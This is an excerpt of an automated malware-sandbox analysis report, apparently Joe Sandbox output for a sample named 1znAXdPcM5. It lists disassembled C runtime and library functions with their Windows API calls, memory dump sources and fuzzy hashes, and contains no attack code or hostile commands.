                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005A3F73,00000000,00000000,?,005AACDB,005A3F73,00000000,00000000,00000000,?,005AAED8,00000006,FlsSetValue), ref: 005AAD66
                                                                                                                    • GetLastError.KERNEL32(?,005AACDB,005A3F73,00000000,00000000,00000000,?,005AAED8,00000006,FlsSetValue,005B7970,FlsSetValue,00000000,00000364,?,005A98B7), ref: 005AAD72
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,005AACDB,005A3F73,00000000,00000000,00000000,?,005AAED8,00000006,FlsSetValue,005B7970,FlsSetValue,00000000), ref: 005AAD80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    • Opcode ID: ed29ef069781f3474c19a79ac3ca98eabe55cd1a97e04b40cd5f21f2b4dd233e
                                                                                                                    • Instruction ID: 5c0319c04a9df3b4ec1cef1eb3f6db9d069efb679adc45d16b10ad4e9456e27f
                                                                                                                    • Opcode Fuzzy Hash: ed29ef069781f3474c19a79ac3ca98eabe55cd1a97e04b40cd5f21f2b4dd233e
                                                                                                                    • Instruction Fuzzy Hash: 77017B36201236ABC7224B68EC48A5F7F98FF567A37140B20F887E7550D721E804C6E1
                                                                                                                    Function 005ABA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005A97E5: GetLastError.KERNEL32(?,005C1030,005A4674,005C1030,?,?,005A3F73,00000050,?,005C1030,00000200), ref: 005A97E9
                                                                                                                      • Part of subcall function 005A97E5: _free.LIBCMT ref: 005A981C
                                                                                                                      • Part of subcall function 005A97E5: SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A985D
                                                                                                                      • Part of subcall function 005A97E5: _abort.LIBCMT ref: 005A9863
                                                                                                                      • Part of subcall function 005ABB4E: _abort.LIBCMT ref: 005ABB80
                                                                                                                      • Part of subcall function 005ABB4E: _free.LIBCMT ref: 005ABBB4
                                                                                                                      • Part of subcall function 005AB7BB: GetOEMCP.KERNEL32(00000000,?,?,005ABA44,?), ref: 005AB7E6
                                                                                                                    • _free.LIBCMT ref: 005ABA9F
                                                                                                                    • _free.LIBCMT ref: 005ABAD5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                    • String ID: p[
                                                                                                                    • API String ID: 2991157371-3527190296
                                                                                                                    • Opcode ID: 6d1f5aedee82e3811e6d13a62e0aa27f6f2178edbfe20dc32c8fb5d16c73f571
                                                                                                                    • Instruction ID: 44fb1df9490e1d0c42be83894ef99259b040887a70dca50c23df00f4518cc306
                                                                                                                    • Opcode Fuzzy Hash: 6d1f5aedee82e3811e6d13a62e0aa27f6f2178edbfe20dc32c8fb5d16c73f571
                                                                                                                    • Instruction Fuzzy Hash: 4231BE71904209AFEB10DF68D445BAD7FF5FF82320F254199E5045B2A3EB729D44DB90
                                                                                                                    Function 0059E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: 2Y$PDu<Y
                                                                                                                    • API String ID: 1269201914-1799397356
                                                                                                                    • Opcode ID: 8d420f774104a4721ed0b5683527e51296926afce941d2837847f8b01c1cf60e
                                                                                                                    • Instruction ID: 0f173911e5b281cc40d512f2a78e10b4b797612acaf0687f62097dbd826c7de7
                                                                                                                    • Opcode Fuzzy Hash: 8d420f774104a4721ed0b5683527e51296926afce941d2837847f8b01c1cf60e
                                                                                                                    • Instruction Fuzzy Hash: A9B012D22680417D3608D14D1D0FE7F0E4CF0C1F1033044BEF444C1080FC405D010431
                                                                                                                    Function 0059E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: (Y$PDu<Y
                                                                                                                    • API String ID: 1269201914-1312676296
                                                                                                                    • Opcode ID: cfb9086bfee4d36fedcb414520d534c3988f6bfbc8c4d108ea82c83c14e1d000
                                                                                                                    • Instruction ID: 3b92d01869cc31b8c5ac76e46f2ed08aa23945db8996af848e99610b7a7af8b7
                                                                                                                    • Opcode Fuzzy Hash: cfb9086bfee4d36fedcb414520d534c3988f6bfbc8c4d108ea82c83c14e1d000
                                                                                                                    • Instruction Fuzzy Hash: F8B012D12680817C3608D14D1E0FD7F0E4CF0C1F20330847EF444C1080FC405C020431
                                                                                                                    Function 00589F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0058D343,00000001,?,?,?,00000000,0059551D,?,?,?), ref: 00589F9E
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0059551D,?,?,?,?,?,00594FC7,?), ref: 00589FE5
                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0058D343,00000001,?,?), ref: 0058A011
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4209713984-0
                                                                                                                    • Opcode ID: 0190a3de19b3f6fe98c1bd195b14de8e456453d82d369a02892f1bdc95e030ed
                                                                                                                    • Instruction ID: fb23d50dafe22e93ec6e2ae5f83369201adc0a2a1bbc912e437dae2ea5cd0f19
                                                                                                                    • Opcode Fuzzy Hash: 0190a3de19b3f6fe98c1bd195b14de8e456453d82d369a02892f1bdc95e030ed
                                                                                                                    • Instruction Fuzzy Hash: B9317F31244305EFEB15AF20D818B7A7BA5FF94715F044A19F981BB290C775AD48CBA2
                                                                                                                    Function 0058A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0058C27E: _wcslen.LIBCMT ref: 0058C284
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A2D9
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A30C
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A329
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2260680371-0
                                                                                                                    • Opcode ID: 55e8c1d37afa981280d43fa3a0a2d39473dc6f3b9e9316a0ba1bc5b9b8d7a71d
                                                                                                                    • Instruction ID: b7c38cd8e86259d6fe1d2a5125e6deed337c2812312ebc8361e71a16e1719e09
                                                                                                                    • Opcode Fuzzy Hash: 55e8c1d37afa981280d43fa3a0a2d39473dc6f3b9e9316a0ba1bc5b9b8d7a71d
                                                                                                                    • Instruction Fuzzy Hash: F601B135200614AAFF21BB758C0DBED3F48BF1A781F044816FD42F6092EB64DA8187B2
                                                                                                                    Function 005AB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 005AB8B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                    • Opcode ID: f63147f719d5073e1d85b2390409450487406fade964bf543595626b2d854507
                                                                                                                    • Instruction ID: b40e33610a45ddd0be196ac34d1a57a0c872f3537b26136433e79fd2ad493d6d
                                                                                                                    • Opcode Fuzzy Hash: f63147f719d5073e1d85b2390409450487406fade964bf543595626b2d854507
                                                                                                                    • Instruction Fuzzy Hash: 8141C87050428C9EEB218E68CC85BFABFBDFB56304F1404EDE59A86143D335AA45DBA1
                                                                                                                    Function 005AAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 005AAFDD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String
                                                                                                                    • String ID: LCMapStringEx
                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                    • Opcode ID: 5869df60e0e0cb2ae73615b23b447cccec7146a076a2df24c880fa090671c380
                                                                                                                    • Instruction ID: 65ed6bb28f4eb7f3f3871d9aa33da931efe3ae7c504257b5d5d75a5d6cfaec7b
                                                                                                                    • Opcode Fuzzy Hash: 5869df60e0e0cb2ae73615b23b447cccec7146a076a2df24c880fa090671c380
                                                                                                                    • Instruction Fuzzy Hash: 1501D33650420EBBCF169FA0DC06DEE7F66FB49750F054254FE1466160CB369A31EB91
                                                                                                                    Function 005AAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,005AA56F), ref: 005AAF55
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                    • Opcode ID: 60cbe4acd282c1de074a1ae8e5c915fee25b629aacddf94a385e55077a3dc10e
                                                                                                                    • Instruction ID: 15eb10ffdb33a9821d64f5de9dd921c5ba0703268c63de6b4c19ce5836c45d8e
                                                                                                                    • Opcode Fuzzy Hash: 60cbe4acd282c1de074a1ae8e5c915fee25b629aacddf94a385e55077a3dc10e
                                                                                                                    • Instruction Fuzzy Hash: 24F0BE3564520CBFCF065F64CC06CAEBF65FF99B21B004164FD08AA260DB316E10EB86
                                                                                                                    Function 005AADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Alloc
                                                                                                                    • String ID: FlsAlloc
                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                    • Opcode ID: 857d4a1fef64b17d9935959921326aaa529cabe315c8ffb56ae2462e7834c3b7
                                                                                                                    • Instruction ID: 1b85f1a72de85d57018593133f7a3fb0c5f38c80a4bb6434f23cc8c29d800b60
                                                                                                                    • Opcode Fuzzy Hash: 857d4a1fef64b17d9935959921326aaa529cabe315c8ffb56ae2462e7834c3b7
                                                                                                                    • Instruction Fuzzy Hash: 5FE0E53164521CBBD711AB65DC079AEBF54FB99B21B0102A9F805A7250CE707E00D6D6
                                                                                                                    Function 0059E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: fd62d5876a3413cb32634dbbe06aa87ef908da4ba8eca7f42497dc25de457c0d
                                                                                                                    • Instruction ID: 96fc545ba4b78a5372f73cdb4447437412a6afe23f694e8fbfec99c24385cf2e
                                                                                                                    • Opcode Fuzzy Hash: fd62d5876a3413cb32634dbbe06aa87ef908da4ba8eca7f42497dc25de457c0d
                                                                                                                    • Instruction Fuzzy Hash: 16B012E5268142BC361C91865C1BC370D0CF0C2B10330883EFC41C44C0DC40BC815431
                                                                                                                    Function 0059E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 0f3f93db655a44035c88762ad72374898102625120088baf60f973c1e9a4d456
                                                                                                                    • Instruction ID: 2dd9b170c64ee0224de7679c69224af858387e7dd18940d7941068e7492b0fac
                                                                                                                    • Opcode Fuzzy Hash: 0f3f93db655a44035c88762ad72374898102625120088baf60f973c1e9a4d456
                                                                                                                    • Instruction Fuzzy Hash: 9AB012E1268042BC361CD2461C0BD370D4CF0C2B10330C43EFC85C51C0DC40BC855431
                                                                                                                    Function 0059E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 91c07bc58d04f64e239fcc908b21bdef02aec38c89913b838605c91b9c2320a5
                                                                                                                    • Instruction ID: 21ee69c09ac069e9c434b629b83f272dd5ba4fdbc8605639fd0f49c4d8d4227f
                                                                                                                    • Opcode Fuzzy Hash: 91c07bc58d04f64e239fcc908b21bdef02aec38c89913b838605c91b9c2320a5
                                                                                                                    • Instruction Fuzzy Hash: 60B012E526C142EC361CD18A5C0BD370D4CF0C1B10330447EF845C50C0DC407C815531
                                                                                                                    Function 0059E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
